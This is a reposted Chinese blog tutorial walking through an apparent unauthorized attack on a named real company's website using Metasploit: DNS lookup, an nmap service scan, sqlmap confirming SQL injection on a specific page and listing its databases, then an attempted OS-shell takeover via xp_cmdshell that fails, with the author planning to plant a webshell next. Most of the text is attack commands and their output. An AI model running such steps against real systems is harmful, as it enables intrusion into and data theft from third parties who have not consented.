All in one: pentest under metasploit

源:http://hi.baidu.com/p3rlish/blog/item/f54f4c097a907f8ad1581b0b.html

作为一个知名的渗透测试框架，metasploit集成了几乎所有的入侵渗透工具，其强大的功能让人叹为观止。慢慢的发掘，你会喜欢上他的

今天我要给大家演示的就是如何在metasploit做入侵渗透测试，从基本的信息收集，到入侵，到内部渗透，所有的这一切都在metasploit中完成。首先我们更新metasploit到最新版本

root@ubuntu:/pentest/exploits/framework3# svn update
A    modules/exploits/windows/browser/ibmegath_getxmlvalue.rb
版本6609。               已经是最新版本，启动framewokr3

root@ubuntu:/pentest/exploits/framework3# ./msfconsole

|                    |      _) |
__ `__ \   _ \ __| _` | __| __ \ | _ \ | __|
|   |   | __/ |   (   |\__ \ |   | | (   | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|
=[ msf v3.3-dev
+ -- --=[ 376 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 153 aux

msf >

确定目标之后，首先我们要收集信息，比如DNS查询，服务器类型查询，端口开放信息查询，我们进行如下操作，至于为何这样，后面再做解释

msf > load db_wmap
[*] =[ WMAP v0.3 - ET LoWNOISE
[*] Successfully loaded plugin: db_wmap
msf > db_driver
[*]    Active Driver: sqlite3
[*]        Available: sqlite3, mysql
msf > load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new ‘db_driver’
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin
msf > db_connect pentest
[*] Successfully connected to the database
[*] File: pentest
msf >

接下来，我们查询目标主机iP

msf > nslookup www.prolific.com.tw
[*] exec: nslookup www.prolific.com.tw

Server:         202.100.192.68
Address:        202.100.192.68#53

Non-authoritative answer:
www.prolific.com.tw canonical name = dns1.prolific.com.tw.
Name: dns1.prolific.com.tw
Address: 59.124.181.149
剩下的就是收集开放端口和服务信息，因为在metasploit里面有多种信息收集方式，出于个人习惯，我使用nmap,同时检测是否存在sqlinject漏洞，我们执行

msf > db_nmap -sV -P0 -O www.prolific.com.tw –script=SQLInject.nse
[*] exec: “/usr/bin/nmap” “-sV” “-P0″ “-O” “www.prolific.com.tw” “–script=SQLInject.nse” “-oX” “/tmp/dbnmap20090602-28001-njyqqa-0″
NMAP:
NMAP: Starting Nmap 4.76 ( http://nmap.org ) at 2009-06-02 03:14 CST
SCRIPT ENGINE: ‘/usr/share/nmap/scripts/skype_v2-version.nse’ threw a run time error and could not be loaded.
SCRIPT ENGINE: ‘/usr/share/nmap/scripts/iax2Detect.nse’ threw a run time error and could not be loaded.
SCRIPT ENGINE: ‘/usr/share/nmap/scripts/PPTPversion.nse’ threw a run time error and could not be loaded.
NMAP: Interesting ports on 59.124.181.149:
NMAP: Not shown: 996 filtered ports
NMAP: PORT    STATE SERVICE VERSION
NMAP: 21/tcp open   ftp     Serv-U ftpd 6.4
NMAP: 53/tcp open   domain Microsoft DNS
NMAP: 80/tcp open   http    Microsoft IIS webserver 6.0
NMAP: 443/tcp closed https
NMAP: Device type: general purpose
NMAP: Running (JUST GUESSING) : Microsoft Windows 2003|2000|XP (98%)
NMAP: Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (98%), Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows 2000 SP4 (93%), Microsoft Windows XP Home SP2 (Russian) (93%), Microsoft Windows XP SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows 2000 Server SP4 (90%), Microsoft Windows Server 2003 SP0 or Windows XP SP2 (90%), Microsoft Windows Server 2003 Enterprise Edition SP2 (88%), Microsoft Windows XP Professional SP2 (French) (88%)
NMAP: No exact OS matches for host (test conditions non-ideal).
NMAP: Service Info: OS: Windows
NMAP:
NMAP: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
NMAP: Nmap done: 1 IP address (1 host up) scanned in 94.14 seconds

未检测出sql注射漏洞，通过扫描我们发现目标主机开放了ftp服务，DNS服务，IIS服务，判断出操作系统是windows server 2003.因为DNS出现了远程堆栈溢出，我们首先尝试对目标机器进行溢出，执行如下操作。

msf > db_hosts
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Host: 59.124.181.149 Status: alive OS:
msf > db_services
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Service: host=59.124.181.149 port=21 proto=tcp state=up name=ftp
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Service: host=59.124.181.149 port=53 proto=tcp state=up name=domain
[*] Time: Tue Jun 02 03:16:22 +0800 2009 Service: host=59.124.181.149 port=80 proto=tcp state=up name=http
msf>

看来溢出无望了，接下来我们检测一下sql注射，这种站应该存在sql注射漏洞，OK,我们使用sqlmap模块

msf>use auxiliary/scanner/http/wmap_sqlmap

msf auxiliary(wmap_sqlmap) >
ok,看参数信息
msf auxiliary(wmap_sqlmap) > info

Name: SQLMAP SQL Injection External Module
Version: 5849

Provided by:
bernardo.damele <bernardo.damele@gmail.com>
daniele.bellucci <daniele.bellucci@gmail.com>

Basic options:
Name         Current Setting    Required Description
—-         —————    ——– ———–
BATCH        true               yes       Never ask for user input, use the default behaviour
BODY                            no        The data string to be sent through POST
METHOD       GET                yes       HTTP Method
OPTS                            no        The sqlmap options to use
PATH         index.php          yes       The path/file to test for SQL injection
Proxies                         no        Use a proxy chain
QUERY        id=1               no        HTTP GET query
RHOSTS                          yes       The target address range or CIDR identifier
RPORT        80                 yes       The target port
SQLMAP_PATH /sqlmap/sqlmap.py yes       The sqlmap >= 0.6.1 full path
SSL          false              no        Use SSL
THREADS      1                  yes       The number of concurrent threads
VHOST                           no        HTTP server virtual host

Description:
This module launch a sqlmap session. sqlmap is an automatic SQL
injection tool developed in Python. Its goal is to detect and take
advantage of SQL injection vulnerabilities on web applications. Once
it detects one or more SQL injections on the target host, the user
can choose among a variety of options to perform an extensive
back-end database management system fingerprint, retrieve DBMS
session user and database, enumerate users, password hashes,
privileges, databases, dump entire or user specific DBMS
tables/columns, run his own SQL SELECT statement, read specific
files on the file system and much more.
恩，具体的参数我就不解释了，接下来，设定参数
msf auxiliary(wmap_sqlmap) > set RHOSTS www.prolific.com.tw
RHOSTS => www.prolific.com.tw
msf auxiliary(wmap_sqlmap) > set OPTS ‘ -g “site:www.prolific.com.tw ext:asp” –dbs’
OPTS => -g “site:www.prolific.com.tw ext:asp” –dbs
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py
SQLMAP_PATH => /var/pentest/database/sqlmap/sqlmap.py

接下来，看我们的配置信息
msf auxiliary(wmap_sqlmap) > show options

Module options:

Name         Current Setting                               Required Description
—-         —————                               ——– ———–
BATCH        true                                          yes       Never ask for user input, use the default behaviour
BODY                                                       no        The data string to be sent through POST
METHOD       GET                                           yes       HTTP Method
OPTS          -g “site:www.prolific.com.tw ext:asp” –dbs no        The sqlmap options to use
PATH         index.php                                     yes       The path/file to test for SQL injection
Proxies                                                    no        Use a proxy chain
QUERY        id=1                                          no        HTTP GET query
RHOSTS       www.prolific.com.tw                           yes       The target address range or CIDR identifier
RPORT        80                                            yes       The target port
SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py        yes       The sqlmap >= 0.6.1 full path
SSL          false                                         no        Use SSL
THREADS      1                                             yes       The number of concurrent threads
VHOST                                                      no        HTTP server virtual host
ok，没问题，开始工作
msf auxiliary(wmap_sqlmap) > run

[*] exec: /var/pentest/database/sqlmap/sqlmap.py -u ‘http://59.124.181.149:80/index.php?id=1′ –method GET -g “site:www.prolific.com.tw ext:asp” –dbs –batch
SQLMAP:
SQLMAP: sqlmap/0.7rc2
SQLMAP: by Bernardo Damele A. G. <bernardo.damele@gmail.com>
SQLMAP:
SQLMAP: [*] starting at: 17:15:14
SQLMAP:
SQLMAP: [17:15:14] [INFO] first request to Google to get the session cookie
SQLMAP: [17:15:15] [INFO] sqlmap got 100 results for your Google dork expression, 69 of them are testable targets
SQLMAP: [17:15:15] [INFO] sqlmap got a total of 70 targets
SQLMAP: [17:15:15] [INFO] url 1:
SQLMAP: GET http://www.prolific.com.tw/eng/downloads.asp?ID=30
SQLMAP: do you want to test this url? [Y/n/q]
SQLMAP: > Y
SQLMAP: [17:15:15] [INFO] testing url http://www.prolific.com.tw/eng/downloads.asp?ID=30
SQLMAP: [17:15:15] [INFO] testing connection to the target url
SQLMAP: [17:15:16] [INFO] testing if the url is stable, wait a few seconds
SQLMAP: [17:15:18] [INFO] url is stable
SQLMAP: [17:15:18] [INFO] testing if User-Agent parameter ‘User-Agent’ is dynamic
SQLMAP: [17:15:20] [WARNING] User-Agent parameter ‘User-Agent’ is not dynamic
SQLMAP: [17:15:20] [INFO] testing if Cookie parameter ‘ASPSESSIONIDAADTSSDT’ is dynamic
SQLMAP: [17:15:22] [WARNING] Cookie parameter ‘ASPSESSIONIDAADTSSDT’ is not dynamic
SQLMAP: [17:15:22] [INFO] testing if GET parameter ‘ID’ is dynamic
SQLMAP: [17:15:23] [INFO] confirming that GET parameter ‘ID’ is dynamic
SQLMAP: [17:15:25] [INFO] GET parameter ‘ID’ is dynamic
SQLMAP: [17:15:25] [INFO] testing sql injection on GET parameter ‘ID’ with 0 parenthesis
SQLMAP: [17:15:25] [INFO] testing unescaped numeric injection on GET parameter ‘ID’
SQLMAP: [17:15:25] [INFO] GET parameter ‘ID’ is not unescaped numeric injectable
SQLMAP: [17:15:25] [INFO] testing single quoted string injection on GET parameter ‘ID’
SQLMAP: [17:15:27] [INFO] confirming single quoted string injection on GET parameter ‘ID’
SQLMAP: [17:15:28] [INFO] GET parameter ‘ID’ is single quoted string injectable with 0 parenthesis
SQLMAP: [17:15:28] [INFO] do you want to exploit this SQL injection? [Y/n] Y
SQLMAP: [17:15:28] [INFO] testing for parenthesis on injectable parameter
SQLMAP: [17:15:30] [INFO] the injectable parameter requires 0 parenthesis
SQLMAP: [17:15:30] [INFO] testing MySQL
SQLMAP: [17:15:31] [WARNING] the back-end DMBS is not MySQL
SQLMAP: [17:15:31] [INFO] testing Oracle
SQLMAP: [17:15:31] [WARNING] the back-end DMBS is not Oracle
SQLMAP: [17:15:31] [INFO] testing PostgreSQL
SQLMAP: [17:15:32] [WARNING] the back-end DMBS is not PostgreSQL
SQLMAP: [17:15:32] [INFO] testing Microsoft SQL Server
SQLMAP: [17:15:33] [INFO] confirming Microsoft SQL Server
SQLMAP: [17:15:34] [INFO] the back-end DBMS is Microsoft SQL Server
SQLMAP: web server operating system: Windows 2000
SQLMAP: web application technology: ASP.NET, Microsoft IIS 6.0, ASP
SQLMAP: back-end DBMS: Microsoft SQL Server 2000
SQLMAP:
SQLMAP: [17:15:34] [INFO] fetching database names
SQLMAP: [17:15:34] [INFO] fetching number of databases
SQLMAP: [17:15:34] [INFO] retrieved: 7
SQLMAP: [17:15:42] [INFO] retrieved: master
SQLMAP: [17:16:43] [INFO] retrieved: model
SQLMAP: [*] msdb
SQLMAP: [*] Northwind
SQLMAP: [*] Prolific
SQLMAP: [*] pubs
SQLMAP: [*] tempdb
SQLMAP:

ok，到这里已经达到我们所想要的目的了，中止继续运行的进程……
[*] Auxiliary module execution completed
msf auxiliary(wmap_sqlmap) >
接下来，我们要用metasploit来测试此注射点了，修改一下参数
msf auxiliary(wmap_sqlmap) > set RHOSTS www.prolific.com.tw
RHOSTS => www.prolific.com.tw
msf auxiliary(wmap_sqlmap) > set PATH /eng/downloads.asp
PATH => /eng/downloads.asp
msf auxiliary(wmap_sqlmap) > set QUERY ID=30
QUERY => ID=30
msf auxiliary(wmap_sqlmap) > set OPTS ‘–os-pwn –msf-path=/var/pentest/framework3
OPTS => –os-pwn –msf-path=/var/pentest/framework3
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py
SQLMAP_PATH => /var/pentest/database/sqlmap/sqlmap.py
msf auxiliary(wmap_sqlmap) > show options

Module options:

Name         Current Setting                              Required Description
—-         —————                              ——– ———–
BATCH        true                                         yes       Never ask for user input, use the default behaviour
BODY                                                      no        The data string to be sent through POST
METHOD       GET                                          yes       HTTP Method
OPTS         –os-pwn –msf-path=/var/pentest/framework3 no        The sqlmap options to use
PATH         /eng/downloads.asp                           yes       The path/file to test for SQL injection
Proxies                                                   no        Use a proxy chain
QUERY        ID=30                                        no        HTTP GET query
RHOSTS       www.prolific.com.tw                          yes       The target address range or CIDR identifier
RPORT        80                                           yes       The target port
SQLMAP_PATH /var/pentest/database/sqlmap/sqlmap.py       yes       The sqlmap >= 0.6.1 full path
SSL          false                                        no        Use SSL
THREADS      1                                            yes       The number of concurrent threads
VHOST                                                     no        HTTP server virtual host

ok,检查无误，我们开始执行
msf auxiliary(wmap_sqlmap) > run

[*] exec: /var/pentest/database/sqlmap/sqlmap.py -u ‘http://59.124.181.149:80//eng/downloads.asp?ID=30′ –method GET –os-pwn –msf-path=/var/pentest/framework3 –batch
SQLMAP:
SQLMAP: sqlmap/0.7rc2
SQLMAP: by Bernardo Damele A. G. <bernardo.damele@gmail.com>
SQLMAP:
SQLMAP: [*] starting at: 17:48:11
SQLMAP:
SQLMAP: [17:48:11] [INFO] testing connection to the target url
SQLMAP: [17:48:12] [INFO] testing if the url is stable, wait a few seconds
SQLMAP: [17:48:14] [INFO] url is stable
SQLMAP: [17:48:14] [INFO] testing if User-Agent parameter ‘User-Agent’ is dynamic
SQLMAP: [17:48:15] [WARNING] User-Agent parameter ‘User-Agent’ is not dynamic
SQLMAP: [17:48:15] [INFO] testing if Cookie parameter ‘ASPSESSIONIDAADTSSDT’ is dynamic
SQLMAP: [17:48:15] [WARNING] Cookie parameter ‘ASPSESSIONIDAADTSSDT’ is not dynamic
SQLMAP: [17:48:15] [INFO] testing if GET parameter ‘ID’ is dynamic
SQLMAP: [17:48:17] [INFO] confirming that GET parameter ‘ID’ is dynamic
SQLMAP: [17:48:19] [INFO] GET parameter ‘ID’ is dynamic
SQLMAP: [17:48:19] [INFO] testing sql injection on GET parameter ‘ID’ with 0 parenthesis
SQLMAP: [17:48:19] [INFO] testing unescaped numeric injection on GET parameter ‘ID’
SQLMAP: [17:48:19] [INFO] GET parameter ‘ID’ is not unescaped numeric injectable
SQLMAP: [17:48:19] [INFO] testing single quoted string injection on GET parameter ‘ID’
SQLMAP: [17:48:22] [INFO] confirming single quoted string injection on GET parameter ‘ID’
SQLMAP: [17:48:22] [INFO] GET parameter ‘ID’ is single quoted string injectable with 0 parenthesis
SQLMAP: [17:48:22] [INFO] testing for parenthesis on injectable parameter
SQLMAP: [17:48:25] [INFO] the injectable parameter requires 0 parenthesis
SQLMAP: [17:48:25] [INFO] testing MySQL
SQLMAP: [17:48:25] [WARNING] the back-end DMBS is not MySQL
SQLMAP: [17:48:25] [INFO] testing Oracle
SQLMAP: [17:48:26] [WARNING] the back-end DMBS is not Oracle
SQLMAP: [17:48:26] [INFO] testing PostgreSQL
SQLMAP: [17:48:27] [WARNING] the back-end DMBS is not PostgreSQL
SQLMAP: [17:48:27] [INFO] testing Microsoft SQL Server
SQLMAP: [17:48:28] [INFO] confirming Microsoft SQL Server
SQLMAP: [17:48:28] [INFO] the back-end DBMS is Microsoft SQL Server
SQLMAP: web server operating system: Windows 2000
SQLMAP: web application technology: ASP.NET, Microsoft IIS 6.0, ASP
SQLMAP: back-end DBMS: Microsoft SQL Server 2000
SQLMAP:
SQLMAP: [17:48:28] [INFO] testing stacked queries support on parameter ‘ID’
SQLMAP: [17:48:39] [INFO] the web application supports stacked queries on parameter ‘ID’
SQLMAP: [17:48:39] [INFO] testing if current user is DBA
SQLMAP: [17:48:39] [INFO] retrieved: 0
SQLMAP: [17:48:44] [WARNING] the functionality requested might not work because the session user is not a database administrator
SQLMAP: [17:48:44] [INFO] checking if xp_cmdshell extended procedure is available, wait..
SQLMAP: [17:48:44] [INFO] xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] Y
SQLMAP: [17:48:45] [WARNING] xp_cmdshell re-enabling failed
SQLMAP: [17:48:45] [INFO] creating xp_cmdshell with sp_OACreate
SQLMAP: [17:48:46] [WARNING] xp_cmdshell creation failed, probably because sp_OACreate is disabled
SQLMAP: [17:48:46] [ERROR] unable to proceed without xp_cmdshell
SQLMAP:
SQLMAP: [*] shutting down at: 17:48:46
SQLMAP:
[*] Auxiliary module execution completed
啊噢，执行失败了，看来此注射点不是sa权限的，无法调用xpcmdshell，剩下的就是要考虑写入webshell了

本文转sinojelly51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/346226，如需转载请自行联系原作者